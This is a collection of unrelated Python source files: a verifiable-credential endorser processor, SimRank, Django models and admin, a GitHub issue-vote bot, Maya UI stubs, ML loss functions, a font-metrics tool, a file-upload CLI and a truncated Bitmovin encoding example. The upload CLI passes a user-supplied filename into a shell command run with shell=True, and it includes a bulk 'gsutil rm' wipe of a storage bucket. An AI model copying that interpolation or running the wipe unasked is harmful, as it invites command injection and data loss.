id | content
---|---
485249
|
import json
from sqlalchemy import update
from api.core.config import settings
from api.core.profile import Profile
from api.db.models.v1.governance import CredentialTemplate
from api.db.session import async_session
from api.endpoints.models.v1.errors import NotFoundError
from api.endpoints.models.v1.governance import TemplateStatusType
from api.protocols.v1.endorser.endorser_protocol import (
DefaultEndorserProtocol,
processing_states,
cancelled_states,
)
class CreateCredDefProcessor(DefaultEndorserProtocol):
def __init__(self):
super().__init__()
def get_schema_id(self, payload: dict) -> str:
try:
return payload["meta_data"]["context"]["schema_id"]
except KeyError:
return None
def get_transaction_id(self, payload: dict) -> str:
try:
return payload["transaction_id"]
except KeyError:
return None
def get_signature(self, payload: dict) -> dict:
endorser_public_did = settings.ACAPY_ENDORSER_PUBLIC_DID
self.logger.debug(f"endorser_public_did = {endorser_public_did}")
signature_json = payload["signature_response"][0]["signature"][
endorser_public_did
]
signature = json.loads(signature_json)
return signature
async def get_credential_template(
self, profile: Profile, payload: dict
) -> CredentialTemplate:
transaction_id = self.get_transaction_id(payload=payload)
try:
async with async_session() as db:
return await CredentialTemplate.get_by_transaction_id(
db, profile.tenant_id, transaction_id
)
except NotFoundError:
return None
async def approve_for_processing(self, profile: Profile, payload: dict) -> bool:
self.logger.info("> approve_for_processing()")
has_schema_id = "schema_id" in payload["meta_data"]["context"]
data_json = json.loads(payload["messages_attach"][0]["data"]["json"])
is_operation_type_102 = data_json and data_json["operation"]["type"] == "102"
template = await self.get_credential_template(profile, payload)
template_exists = template is not None
approved = has_schema_id and is_operation_type_102 and template_exists
self.logger.debug(f"has_schema_id={has_schema_id}")
self.logger.debug(f"is_operation_type_102={is_operation_type_102}")
self.logger.debug(f"template_exists={template_exists}")
self.logger.info(f"< approve_for_processing({approved})")
return approved
async def before_any(self, profile: Profile, payload: dict):
self.logger.info("> before_any()")
o = await self.get_credential_template(profile, payload)
schema_id = self.get_schema_id(payload)
self.logger.debug(f"credential_template = {o}")
self.logger.debug(f"schema_id = {schema_id}")
if o:
values = {
"state": payload["state"],
"schema_id": schema_id,
}
self.logger.debug(f"update values = {values}")
await self.update_state(payload, profile, values, o)
self.logger.info("< before_any()")
async def on_transaction_acked(self, profile: Profile, payload: dict):
self.logger.info("> on_transaction_acked()")
item = await self.get_credential_template(profile, payload)
# it is here that we get the cred def id...
# pull it out of the signature
signature = self.get_signature(payload)
public_did = signature["identifier"]
sig_type = signature["operation"]["signature_type"]
schema_ref = signature["operation"]["ref"]
tag = signature["operation"]["tag"]
cred_def_id = f"{public_did}:3:{sig_type}:{schema_ref}:{tag}"
values = {"cred_def_id": cred_def_id}
if not item.revocation_enabled:
# set Status to Active if we are not allowing revocation
# otherwise, the revocation processor will set active when appropriate
values["status"] = TemplateStatusType.active
self.logger.debug(f"update values = {values}")
stmt = (
update(CredentialTemplate)
.where(
CredentialTemplate.credential_template_id == item.credential_template_id
)
.values(values)
)
async with async_session() as db:
await db.execute(stmt)
await db.commit()
self.logger.info("< on_transaction_acked()")
async def update_state(self, payload, profile, values, item):
self.logger.info("> update_state()")
if payload["state"] in processing_states:
values["status"] = TemplateStatusType.in_progress
if payload["state"] in cancelled_states:
values["status"] = TemplateStatusType.cancelled
self.logger.debug(f"update values = {values}")
stmt = (
update(CredentialTemplate)
.where(
CredentialTemplate.credential_template_id == item.credential_template_id
)
.values(values)
)
async with async_session() as db:
await db.execute(stmt)
await db.commit()
self.logger.info("< update_state()")
async def set_active(self, profile, item):
self.logger.info("> set_active()")
values = {"status": TemplateStatusType.active}
self.logger.debug(f"update values = {values}")
stmt = (
update(CredentialTemplate)
.where(
CredentialTemplate.credential_template_id == item.credential_template_id
)
.values(values)
)
async with async_session() as db:
await db.execute(stmt)
await db.commit()
self.logger.info("< set_active()")
|
485252
|
from src.Graph import Node, Graph
from src.Similarity import Similarity
from src.utils.utils import init_graph
import numpy as np
def SimRank_one_iter(graph, sim):
for node1 in graph.nodes:
for node2 in graph.nodes:
new_SimRank = sim.calculate_SimRank(node1, node2)
sim.update_sim_value(node1, node2, new_SimRank)
# print(node1.label, node2.label, new_SimRank)
sim.replace_sim()
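# Assumed definition behind Similarity.calculate_SimRank (the standard SimRank recurrence of
# Jeh & Widom, 2002), with C the decay factor and I(x) the set of in-neighbours of node x:
#     s(a, a) = 1
#     s(a, b) = C / (|I(a)| * |I(b)|) * sum_{u in I(a)} sum_{v in I(b)} s(u, v)
# A pair where either node has no in-neighbours gets similarity 0.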
def SimRank(graph, sim, iteration=100):
for i in range(iteration):
SimRank_one_iter(graph, sim)
# ans = sim.get_sim_matrix()
# print(ans)
# print()
if __name__ == '__main__':
decay_factor = 0.9
iteration = 100
graph = init_graph('dataset/graph_4.txt')
sim = Similarity(graph, decay_factor)
SimRank(graph, sim, iteration)
ans = sim.get_sim_matrix()
print(ans)
np.savetxt('SimRank.txt', ans, delimiter=' ', fmt='%.2f')
|
485254
|
from django.contrib import admin
# from django.contrib.auth.admin import UserAdmin
from .models import User
class CustomUserAdmin(admin.ModelAdmin):
model = User
list_display = ('screen_name', 'twitter_id', 'is_staff')
fields = ('screen_name', 'twitter_id', 'is_protected', 'is_staff', 'is_superuser')
ordering = ('screen_name', )
admin.site.register(User, CustomUserAdmin)
|
485269
|
import logging
import arrow
import re
from requests.exceptions import HTTPError
import settings
import github_api as gh
from lib.db.models import Comment, User, ActiveIssueCommands, Issue
from lib.db.models import RunTimes, InactiveIssueCommands
'''
Command Syntax
/vote close closes issue when no nay reactions on this comment are added within voting window
/vote reopen reopens issue when see above ^^^
/vote label=<LABEL_TEXT> adds label when ^^^
/vote remove-label=<LABEL_TEXT> removes label when ^^^
/vote assign=<USER> assigns to user when ^^^
/vote unassign=<USER> unassigns from user when ^^^
'''
# If no subcommands, map cmd: None
COMMAND_LIST = {
"/vote": ("close", "reopen")
}
__log = logging.getLogger("read_issue_comments")
def get_seconds_remaining(api, comment_id):
voting_window = gh.voting.get_initial_voting_window()
seconds_remaining = gh.issues.voting_window_remaining_seconds(api, settings.URN, comment_id,
voting_window)
seconds_remaining = max(0, seconds_remaining) # No negative time
return seconds_remaining
def insert_or_update(api, cmd_obj):
# Find the comment, or create it if it doesn't exist
comment_id = cmd_obj["global_comment_id"]
issue, _ = Issue.get_or_create(issue_id=cmd_obj["issue_id"])
user, _ = User.get_or_create(user_id=cmd_obj["user"]["id"],
defaults={"login": cmd_obj["user"]["login"]})
comment, _ = Comment.get_or_create(comment_id=comment_id,
defaults={
"user": user, "text": cmd_obj["comment_text"],
"created_at": cmd_obj["created_at"],
"updated_at": cmd_obj["updated_at"]
})
command, _ = ActiveIssueCommands.get_or_create(comment=comment,
issue=issue)
update_cmd(api, command, cmd_obj["comment_text"])
def update_cmd(api, cmd_obj, comment_text):
# Need to keep the comment text and time remaining fresh
comment_id = cmd_obj.comment.comment_id
Comment.update(text=comment_text).where(Comment.comment_id == comment_id).execute()
seconds_remaining = get_seconds_remaining(api, comment_id)
ActiveIssueCommands.update(comment=Comment.get(comment_id=comment_id),
seconds_remaining=seconds_remaining).where(
ActiveIssueCommands.comment == comment_id).execute()
def has_enough_votes(votes):
# At least one negative vote will cause vote to not pass
for user, vote in votes.items():
if vote < 0:
# __log.debug("vote less than one")
return False
return True
def post_command_status_update(api, cmd, has_votes):
time = gh.misc.seconds_to_human(cmd.seconds_remaining)
command_text = cmd.comment.text
status = "passing :white_check_mark:" if has_votes else "failing :no_entry:"
body = "> {command}\n\nTime remaining: {time} - Vote status: {status}".format(
command=command_text,
time=time,
status=status)
if cmd.chaos_response:
# Update comment
resp = gh.comments.edit_comment(api, settings.URN, cmd.chaos_response.comment_id, body)
else:
# New response comment
resp = gh.comments.leave_comment(api, settings.URN, cmd.issue.issue_id, body)
user, _ = User.get_or_create(user_id=resp["user"]["id"],
defaults={"login": resp["user"]["login"]})
resp_comment, _ = Comment.get_or_create(comment_id=resp["id"],
defaults={
"user": user, "text": body,
"created_at": resp["created_at"],
"updated_at": resp["updated_at"]
})
ActiveIssueCommands.update(chaos_response=resp_comment).where(
ActiveIssueCommands.comment == cmd.comment.comment_id).execute()
def can_run_vote_command(api, cmd):
if cmd.seconds_remaining > 0:
return False
return True
def update_command_ran(api, comment_id, text):
cmd = ActiveIssueCommands.get(ActiveIssueCommands.comment == comment_id)
InactiveIssueCommands.get_or_create(comment=cmd.comment)
body = "> {command}\n\n{text}".format(command=cmd.comment.text, text=text)
gh.comments.edit_comment(api, settings.URN, cmd.chaos_response.comment_id, body)
cmd.delete_instance()
def get_command_votes(api, urn, comment_id):
votes = {}
try:
for voter, vote in gh.voting.get_comment_reaction_votes(api, urn, comment_id):
votes[voter] = vote
except HTTPError as e:
# Command possibly deleted
__log.error("Unable to get votes for command id: {id} - {msg}".format(id=comment_id,
msg=str(e)))
raise e
# Figure out what happened later
return votes
def handle_vote_command(api, command, issue_id, comment_id, votes):
orig_command = command[:]
# Check for correct command syntax, ie, subcommands
log_warning = False
if len(command):
sub_command = command.pop(0)
if sub_command == "close":
gh.issues.close_issue(api, settings.URN, issue_id)
elif sub_command == "reopen":
gh.issues.open_issue(api, settings.URN, issue_id)
else:
# Implement other commands
pass
else:
log_warning = True
if log_warning:
__log.warning("Unknown issue command syntax: /vote {command}".format(command=orig_command))
def handle_comment(api, cmd):
issue_id = cmd.issue.issue_id
comment_id = cmd.comment.comment_id
comment_text = cmd.comment.text
comment_text = re.sub(r'\s+', ' ', comment_text)
parsed_comment = list(map(lambda x: x.lower(), comment_text.split(' ')))
command = parsed_comment.pop(0)
votes = get_command_votes(api, settings.URN, comment_id)
update_cmd(api, cmd, comment_text)
can_run = can_run_vote_command(api, cmd)
has_votes = has_enough_votes(votes)
post_command_status_update(api, cmd, has_votes)
# We doin stuff boyz
if can_run and has_votes:
__log.debug("Handling issue {issue}: command {comment}".format(issue=issue_id,
comment=comment_text))
if command == "/vote":
handle_vote_command(api, parsed_comment, issue_id, comment_id, votes)
update_command_ran(api, comment_id, "Command Ran")
elif can_run and not has_votes:
# oops we didn't pass
update_command_ran(api, comment_id, "Vote Failed")
def is_command(comment):
comment = re.sub(r'\s+', ' ', comment)
parsed_comment = list(map(lambda x: x.lower(), comment.split(' ')))
cmd = parsed_comment[0]
is_cmd = False
if cmd in COMMAND_LIST:
subcommands = COMMAND_LIST.get(cmd, None)
# 4 cases
# 1. No subcommands for command
# 2. Subcommands exist, and args has it
# 3. Subcommands exist, and args don't have it
# 4. Args specify nonexistent subcommand
if subcommands is None:
is_cmd = True # Already have the command
else:
sub_cmd_with_args = parsed_comment[1:]
if len(sub_cmd_with_args) > 0:
sub_cmd = sub_cmd_with_args[0]
# Check cond 2
if sub_cmd in subcommands:
is_cmd = True
else:
is_cmd = False
else:
# Cond 3
is_cmd = False
return is_cmd
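# Illustrative results with COMMAND_LIST = {"/vote": ("close", "reopen")} (comment strings are hypothetical):
#   is_command("/vote close")      -> True   (case 2: known subcommand)
#   is_command("/vote")            -> False  (case 3: subcommands exist but none given)
#   is_command("/vote frobnicate") -> False  (case 4: unknown subcommand)
#   is_command("hello world")      -> False  (not a command at all)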
def poll_read_issue_comments(api):
__log.info("looking for issue comments")
run_time, created = RunTimes.get_or_create(command="issue_commands")
# No last ran time if just created
if created:
last_ran = None
else:
last_ran = arrow.get(run_time.last_ran)
paged_results = gh.comments.get_all_issue_comments(api,
settings.URN,
page='all',
since=last_ran)
# This now only finds new entries that have been either posted or updated
# Add them to our database
# If page=all, you have to loop through pages as well
for page in paged_results:
for issue_comment in page:
# Get info and store in db
# Do a check to make sure comment_id isn't a command that already ran
if is_command(issue_comment["comment_text"]):
_id = issue_comment["global_comment_id"]
# HOTFIX to not re-add command if it was already ran.
try:
InactiveIssueCommands.get(comment=_id)
except InactiveIssueCommands.DoesNotExist:
insert_or_update(api, issue_comment)
cmds = ActiveIssueCommands.select().order_by(ActiveIssueCommands.seconds_remaining)
for cmd in cmds:
try:
handle_comment(api, cmd)
except HTTPError as e:
# Check if 404 here
# Maybe remove response comment too?
cmd.comment.delete_instance()
cmd.delete_instance()
last_ran = gh.misc.dt_to_github_dt(arrow.utcnow())
RunTimes.update(last_ran=last_ran).where(RunTimes.command == "issue_commands").execute()
__log.info("Waiting %d seconds until next scheduled Issue comment polling",
settings.ISSUE_COMMENT_POLLING_INTERVAL_SECONDS)
|
485270
|
from PySide2.QtCore import *
from PySide2.QtGui import QColor
from PySide2.QtGui import QGuiApplication
from PySide2.QtGui import QFontMetrics
from PySide2.QtGui import QFont
from PySide2.QtGui import QStandardItem
from PySide2.QtWidgets import QApplication
from PySide2.QtGui import QStandardItemModel
import maya.app.renderSetup.views.proxy.renderSetup as rsProxy
class LightEditorProxy(rsProxy.DataModelListObserver, QStandardItemModel):
"""
The class provides the Qt model counterpart for the LightEditor model
"""
def __eq__(self, o):
pass
def __init__(self, parent='None'):
pass
def __ne__(self, o):
pass
def aboutToDelete(self):
"""
Cleanup method to be called immediately before the object is deleted.
"""
pass
def attachChild(self, child, pos):
pass
def child(self, row, column='0'):
pass
def createListItemProxy(self, listItem):
pass
def dispose(self):
"""
Cleanup method to be called immediately before the object is deleted.
"""
pass
def dropMimeData(self, mimeData, action, row, column, parentIndex):
pass
def findProxyItem(self, name):
pass
def flags(self, index):
pass
def mimeData(self, indices):
"""
This method builds the mimeData if the selection is correct
"""
pass
def mimeTypes(self):
pass
def refreshModel(self):
pass
def resetModel(self):
pass
def supportedDropActions(self):
pass
def type(self):
pass
def typeIdx(self):
pass
model = None
staticMetaObject = None
import maya.app.renderSetup.views.pySide.standardItem as standardItem
class LightEditorItemProxy(standardItem.StandardItem):
def __init__(self, model):
pass
def aboutToDelete(self):
"""
Cleanup method to be called immediately before the object is deleted.
"""
pass
def data(self, role):
pass
def delete(self):
pass
def dispose(self):
"""
Cleanup method to be called immediately before the object is deleted.
"""
pass
def equalsDragType(self, dragType):
pass
def findProxyItem(self, name):
pass
def genericTypeIdx(self):
pass
def getActionButton(self, column):
pass
def getActionButtonCount(self):
pass
def handleDragMoveEvent(self, event):
pass
def handleDropEvent(self, event, sceneView):
pass
def headingWidth(self, heading):
pass
def isActive(self):
pass
def isCopyable(self):
pass
def isDropAllowed(self, destinationModel):
pass
def isModelDirty(self):
"""
This method is a workaround. It should not be necessary, but it currently is because we set
tooltips in the treeview, and that triggers emitDataChanged, which in turn rebuilds or
repopulates the property editor. The proper fix is to use columns in the treeview, each with
its own static tooltip, so that tooltips no longer need to be set dynamically by the delegate
(views/renderSetupDelegate.py) depending on the lastHitAction.
"""
pass
def modelChanged(*args, **kwargs):
pass
def onClick(self, view):
pass
def onDoubleClick(self, view):
pass
def setData(self, value, role):
pass
def supportsAction(self, action, numIndexes):
pass
model = None
class LightEditorGroupProxy(rsProxy.DataModelListObserver, LightEditorItemProxy):
"""
The class provides the Qt model counterpart for the LightEditorGroup
"""
def __init__(self, model):
pass
def aboutToDelete(self):
"""
Cleanup method to be called immediately before the object is deleted.
"""
pass
def acceptsDrops(self, attribute):
pass
def attachChild(self, override, pos):
pass
def createListItemProxy(self, listItem):
pass
def data(self, role):
pass
def dispose(self):
"""
Cleanup method to be called immediately before the object is deleted.
"""
pass
def type(self):
pass
def typeIdx(self):
pass
class LightEditorLightProxy(LightEditorItemProxy):
"""
The class provides the Qt model counterpart for the LightEditorLight
"""
def __init__(self, model):
pass
def acceptsDrops(self, attribute):
pass
def columnData(self, role, column):
pass
def data(self, role):
pass
def type(self):
pass
def typeIdx(self):
pass
def getProxy(dataModel):
pass
LIGHT_EDITOR_MIME_TYPE = 'application/lightEditor'
kCollectionWarningStr = []
LIGHT_TEXT_COLOR_LOCKED = None
kFiltersMenu = []
kRelativeType = []
kFilterTransformsShapesShaders = []
kCreateRelativeOverrideAction = []
kFilterAll = []
kDragAndDrop = []
LIGHT_TEXT_COLOR_ANIMATED = None
kDragAndDropFailed = []
kAbsolute = []
kCreateConnectionOverrideAction = []
kSetLocalRender = []
LIGHT_EDITOR_ITEM_TYPE = 1013
kCameras = []
kSetVisibilityAction = []
kCreateCollectionAction = []
LIGHT_EDITOR_TYPE = 1012
kOverrideWarningStr = []
kFilterCameras = []
kRenderLayerWarningStr = []
LIGHT_EDITOR_LIGHT_TYPE = 1014
kRenameAction = []
kCreateMaterialOverrideAction = []
kLights = []
LIGHT_EDITOR_ITEM_TYPE_IDX = 13
kAOVs = []
LIGHT_EDITOR_GROUP_TYPE = 1015
kFilterGeometry = []
kRenderSettings = []
kFilterShaders = []
kFilterLights = []
kFilterTransforms = []
kSetIsolateSelectedAction = []
kExpandCollapseAction = []
kRelative = []
kSelectionTypeError = []
kConnectionType = []
kFilterCustom = []
LIGHT_TEXT_COLOR_OVERRIDEN_BY_US = None
kAbsoluteType = []
kNewFilter = []
kMaterialType = []
kCreateShaderOverrideAction = []
LIGHT_EDITOR_GROUP_TYPE_IDX = 15
kShaderType = []
kSetRenderableAction = []
kCreateRenderSettingsChildCollectionAction = []
LIGHT_EDITOR_LIGHT_TYPE_IDX = 14
kFilterSets = []
kSetEnabledAction = []
LIGHT_TEXT_COLOR = None
kCreateAbsoluteOverrideAction = []
LIGHT_EDITOR_TYPE_IDX = 12
kNoOverride = []
kDeleteAction = []
kFilterTransformsAndShapes = []
|
485299
|
from pysad.core.base_postprocessor import BasePostprocessor
import numpy as np
from pysad.utils.window import Window, UnlimitedWindow
class ConformalProbabilityCalibrator(BasePostprocessor):
"""This class provides an interface to convert the scores into probabilities through conformal prediction. Note that :cite:`laxhammar2013online` fits conformal calibration to already fitted samples' scores by the model whereas :cite:`ishimtsev2017conformal` fits the conformal calibration to some window of previous samples that are just before the target instance.
This calibrator transforms by providing target score divided by the number of instances that are fitted before to this calibrator as transformation result.
Args:
windowed (bool): Whether the probability calibrator is windowed so that forget scores that are older than `window_size`.
window_size (int): The size of window for running average and std. Ignored if `running_statistics` parameter is False.
"""
def __init__(self, windowed=True, window_size=300):
self.windowed = windowed
self.window_size = window_size
self.window = Window(window_size=self.window_size) if self.windowed else UnlimitedWindow()
def fit_partial(self, score):
"""Fits particular (next) timestep's score to train the postprocessor.
Args:
score (float): Input score.
Returns:
object: self.
"""
self.window.update(score)
return self
def transform_partial(self, score):
"""Transforms given score.
Args:
score (float): Input score.
Returns:
float: Processed score.
"""
return (np.sum(np.array(self.window.get()) > score)) / (len(self.window.get()))
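# Minimal streaming usage sketch (the score source `raw_scores` is a hypothetical iterable of floats):
#
#   calibrator = ConformalProbabilityCalibrator(windowed=True, window_size=300)
#   for score in raw_scores:
#       calibrator.fit_partial(score)               # add the score to the window first ...
#       prob = calibrator.transform_partial(score)  # ... so the window is never empty here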
|
485301
|
import tensorflow as tf
"""
Note that we have only one label (it is 'face'),
so num_classes = 1.
"""
from train_config import config as cfg
def localization_loss(predictions, targets, weights, sigma=1.0):
"""The usual smooth L1 loss.
Arguments:
predictions: a float tensor with shape [batch_size, num_anchors, 4],
representing the (encoded) predicted locations of objects.
targets: a float tensor with shape [batch_size, num_anchors, 4],
representing the regression targets.
weights: a float tensor with shape [batch_size, num_anchors].
Returns:
a float tensor with shape [batch_size, num_anchors].
"""
abs_diff = tf.abs(predictions - targets)
abs_diff_lt_1 = tf.less(abs_diff, 1.0/sigma)
return weights * tf.reduce_sum(
tf.where(abs_diff_lt_1, 0.5 * tf.square(abs_diff), abs_diff - 0.5/sigma), axis=2
)
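# Piecewise form computed above (with the default sigma=1 this is the usual smooth L1 / Huber-style loss):
#     f(d) = 0.5 * d**2         if |d| < 1/sigma
#     f(d) = |d| - 0.5/sigma    otherwise
# where d is the per-coordinate difference; the result is summed over the 4 box coordinates and masked by `weights`.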
def classification_loss(predictions, targets):
"""
Arguments:
predictions: a float tensor with shape [batch_size, num_anchors, num_classes + 1],
representing the predicted logits for each class.
targets: an int tensor with shape [batch_size, num_anchors].
Returns:
a float tensor with shape [batch_size, num_anchors].
"""
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=targets, logits=predictions
)
return cross_entropy
def ohem_loss(logits, targets, weights):
logits=tf.reshape(logits,shape=[-1,cfg.DATA.NUM_CLASS])
targets = tf.reshape(targets, shape=[-1])
weights=tf.reshape(weights,shape=[-1])
dtype = logits.dtype
pmask = weights
fpmask = tf.cast(pmask, dtype)
n_positives = tf.reduce_sum(fpmask)
no_classes = tf.cast(pmask, tf.int32)
predictions = tf.nn.softmax(logits)
nmask = tf.logical_not(tf.cast(pmask,tf.bool))
fnmask = tf.cast(nmask, dtype)
nvalues = tf.where(nmask,
predictions[:, 0],
1. - fnmask)
nvalues_flat = tf.reshape(nvalues, [-1])
# Number of negative entries to select.
max_neg_entries = tf.cast(tf.reduce_sum(fnmask), tf.int32)
n_neg = tf.cast(cfg.MODEL.max_negatives_per_positive * n_positives, tf.int32) + cfg.TRAIN.batch_size
n_neg = tf.minimum(n_neg, max_neg_entries)
val, idxes = tf.nn.top_k(-nvalues_flat, k=n_neg)
max_hard_pred = -val[-1]
# Final negative mask.
nmask = tf.logical_and(nmask, nvalues < max_hard_pred)
fnmask = tf.cast(nmask, dtype)
# Add cross-entropy loss.
with tf.name_scope('cross_entropy_pos'):
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits,
labels=targets)
pos_loss = tf.reduce_sum(loss * fpmask)
with tf.name_scope('cross_entropy_neg'):
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits,
labels=no_classes)
neg_loss = tf.reduce_sum(loss * fnmask)
return pos_loss + neg_loss
|
485343
|
from __future__ import unicode_literals
from django.db import models
from django.utils import timezone
# Create your models here.
class AdminAuthInstance(models.Model):
"""Instance of authorization from admin."""
class Meta:
verbose_name = "Admin Authorization (Record)"
verbose_name_plural = verbose_name
unique_together = ("rule", "principal")
rule = models.ForeignKey("access.Rule")
principal = models.ForeignKey("beetle.VirtualDevice")
allow = models.BooleanField(default=True)
timestamp = models.DateTimeField(auto_now_add=True)
expire = models.DateTimeField(default=timezone.now)
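# Note: passing the callable (timezone.now, not timezone.now()) means `expire` defaults to the
# moment the row is created, so an authorization starts out expired unless `expire` is extended later.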
def __unicode__(self):
return "%d %s" % (self.rule.id, self.principal.name)
class UserAuthInstance(models.Model):
"""Instance of authentication of user."""
class Meta:
verbose_name = "User Authentication (Record)"
verbose_name_plural = verbose_name
unique_together = ("rule", "principal")
rule = models.ForeignKey("access.Rule")
principal = models.ForeignKey("beetle.VirtualDevice")
allow = models.BooleanField(default=True)
timestamp = models.DateTimeField(auto_now_add=True)
expire = models.DateTimeField(default=timezone.now)
def __unicode__(self):
return "%d %s" % (self.rule.id, self.principal.name)
class PasscodeAuthInstance(models.Model):
"""Instance of password authentication."""
class Meta:
verbose_name = "Passcode Authentication (Record)"
verbose_name_plural = verbose_name
unique_together = ("rule", "principal")
rule = models.ForeignKey("access.Rule")
principal = models.ForeignKey("beetle.VirtualDevice")
timestamp = models.DateTimeField(auto_now_add=True)
expire = models.DateTimeField(default=timezone.now)
def __unicode__(self):
return "%d %s" % (self.rule.id, self.principal.name)
class ExclusiveLease(models.Model):
"""A lease of exclusivity"""
class Meta:
verbose_name = "Exclusive (Lease)"
verbose_name_plural = verbose_name
group = models.OneToOneField("access.Exclusive")
device_instance = models.ForeignKey("network.ConnectedDevice")
timestamp = models.DateTimeField(auto_now_add=True)
expire = models.DateTimeField(default=timezone.now)
def __unicode__(self):
return "%d %s" % (self.group.id, self.device_instance.name)
|
485372
|
import argparse
import getpass
import random
import string
import sys
from hashlib import sha512
from pathlib import Path
from subprocess import call
def h(text: str) -> str:
return sha512(text.encode('UTF-8')).hexdigest()
parser = argparse.ArgumentParser(
prog='xfer', description='Temporarily upload a file to evanchen.cc/xfer'
)
random_salt = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(64))
parser.add_argument('filename', nargs='?', help='Path of file to upload')
parser.add_argument('-n', '--name', help='Name of the file to upload.')
parser.add_argument('-s', '--salt', nargs='?', const=random_salt, default='')
group = parser.add_mutually_exclusive_group()
group.add_argument('-p', '--password', help='Path to a password file, else getpass used.')
group.add_argument('-i', '--insecure', help='Specify the password via command line (insecure)')
group.add_argument('-e', '--echo', action='store_true', help="Don't hide with getpass.")
parser.add_argument(
'-d', '--dry-run', action='store_true', help='Dry run, do not actually upload file.'
)
parser.add_argument('-w', '--wipe', action='store_true', help='Erase all files.')
args = parser.parse_args()
if __name__ == "__main__":
if args.filename is not None:
if args.password:
password = Path(args.password).read_text().strip()
elif args.insecure:
password = args.insecure
elif args.echo:
password = input('Password: ').strip()
else:
while True:
password = getpass.getpass().strip()
password_confirm = getpass.getpass(prompt='Repeat: ').strip()
if password == password_confirm:
break
else:
print("Passwords did not match. Try again.")
filename = args.name or args.filename
salt = args.salt
kludge = 'evanchen.cc/xfer|' + filename + '|' + salt + '|' + password
h1 = h(kludge)
h2 = h(h1)
checksum = h2[0:6]
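# Scheme implemented above: h1 = sha512("evanchen.cc/xfer|<name>|<salt>|<password>") names the
# uploaded object in the bucket, and the first 6 hex digits of h2 = sha512(h1) are exposed in the
# download URL as `h=`, presumably re-derived and checked client-side by xfer.html.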
if not args.dry_run:
url = f"gs://web.evanchen.cc/xfer-payload/{h1}"
call(
f'gsutil cp "{args.filename}" {url} > /dev/null',
shell=True,
)
call(
f"gsutil -m setmeta -h 'Cache-Control:private, max-age=0, no-transform' {url}",
shell=True,
)
url = f'https://web.evanchen.cc/xfer.html?f={filename}&h={checksum}'
if salt:
url += f'&s={salt}'
print('-' * 40)
print(url)
elif args.wipe:
if 'y' in input("Are you sure? ").lower():
call(
"gsutil -m rm gs://web.evanchen.cc/xfer-payload/*",
shell=True,
)
else:
print("Need to specify a file to upload (or use --wipe to erase all).")
sys.exit(1)
|
485373
|
import os
import string
import json
import cairo
VALID_CHARS = (" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ" +
"[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~")
FORMAT_JSON = False
def updatefonts():
dir_path = os.path.dirname(os.path.realpath(__file__))
fontlist_path = os.path.join(dir_path, "fontlist.txt")
with open(fontlist_path, 'r') as f:
    lines = f.readlines()
fonts = []
for line in lines:
font_size = line.split(",")
font_size[0] = font_size[0].strip()
font_size[1] = int(font_size[1].strip())
fonts.append(tuple(font_size))
surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, 1, 1)
ctx = cairo.Context(surface)
table = {}
for font in fonts:
fontname = font[0]
fontsize = font[1]
chardata = {}
ctx.select_font_face(fontname)
ctx.set_font_size(fontsize)
for ch in list(VALID_CHARS):
x, y, width, height, dx, dy = ctx.text_extents(ch)
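# cairo's text_extents() returns (x_bearing, y_bearing, width, height, x_advance, y_advance);
# that tuple is stored per character below.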
chardata[ch] = [x, y, width, height, dx, dy]
for i, val in enumerate(chardata[ch]):
if abs(round(val) - val) < 1e-6:
chardata[ch][i] = int(round(val))
if fontname not in table:
table[fontname] = {}
table[fontname][str(fontsize)] = chardata
json_data = json.dumps(table)
write_path = os.path.join(dir_path, "fontdata.json")
with open(write_path, 'w') as outfile:
if FORMAT_JSON:
json.dump(table, outfile, sort_keys=True, indent=4)
else:
json.dump(table, outfile, separators=(',', ':'))
|
485380
|
from bitmovin import Bitmovin, Encoding, H264CodecConfiguration, \
AACCodecConfiguration, H264Profile, StreamInput, SelectionMode, Stream, EncodingOutput, ACLEntry, ACLPermission, \
FMP4Muxing, MuxingStream, CloudRegion, DashManifest, FMP4Representation, FMP4RepresentationType, Period, \
VideoAdaptationSet, AudioAdaptationSet, LocalOutput, LocalInput
from bitmovin.errors import BitmovinError
API_KEY = '<INSERT_YOUR_API_KEY>'
INFRASTRUCTURE_ID = '<INSERT_YOUR_INFRASTRUCTURE_ID>'
CLOUD_REGION = CloudRegion.EXTERNAL
INPUT_BASE_PATH = '/tmp/inputs'
RELATIVE_INPUT_FILE_PATH = 'relative/path/to/you/input.mkv'
OUTPUT_BASE_PATH = '/tmp/outputs'
RELATIVE_OUTPUT_PATH = 'relative/path/to/your/output/'
DASH_MANIFEST_NAME = 'example_dash_manifest.mpd'
def main():
bitmovin = Bitmovin(api_key=API_KEY)
local_input = LocalInput(name='My Local Input', path=INPUT_BASE_PATH)
local_output = LocalOutput(name='My Local Output', path=OUTPUT_BASE_PATH)
created_input = bitmovin.inputs.Local.create(local_input).resource
created_output = bitmovin.outputs.Local.create(local_output).resource
encoding = Encoding(name='Local Input Output Example',
cloud_region=CLOUD_REGION,
infrastructure_id=INFRASTRUCTURE_ID)
encoding = bitmovin.encodings.Encoding.create(encoding).resource
##########################
# qualities
video_qualities = [
{'width': 1280, 'height': 720, 'bitrate': 2400000, 'bframes': None, 'profile': H264Profile.HIGH, 'level': None},
{'width': 854, 'height': 480, 'bitrate': 1200000, 'bframes': None, 'profile': H264Profile.HIGH, 'level': None},
{'width': 640, 'height': 360, 'bitrate': 800000, 'bframes': None, 'profile': H264Profile.HIGH, 'level': None},
]
audio_qualities = [
{'bitrate': 128000, 'rate': 48000},
]
##########################
# configurations
video_configs = []
audio_configs = []
for video_quality in video_qualities:
config = H264CodecConfiguration(name='h264_{}x{}_{}'.format(video_quality['width'], video_quality['height'],
video_quality['bitrate']),
rate=None,
width=video_quality['width'],
height=video_quality['height'],
bitrate=video_quality['bitrate'],
bframes=video_quality['bframes'],
profile=video_quality['profile'],
level=video_quality['level']
)
config = bitmovin.codecConfigurations.H264.create(config).resource
video_configs.append(config)
for audio_quality in audio_qualities:
config = AACCodecConfiguration(name='aac_{}_{}'.format(audio_quality['bitrate'], audio_quality['rate']),
bitrate=audio_quality['bitrate'],
rate=audio_quality['rate'])
config = bitmovin.codecConfigurations.AAC.create(config).resource
audio_configs.append(config)
video_input_stream = StreamInput(input_id=created_input.id,
input_path=RELATIVE_INPUT_FILE_PATH,
selection_mode=SelectionMode.AUTO)
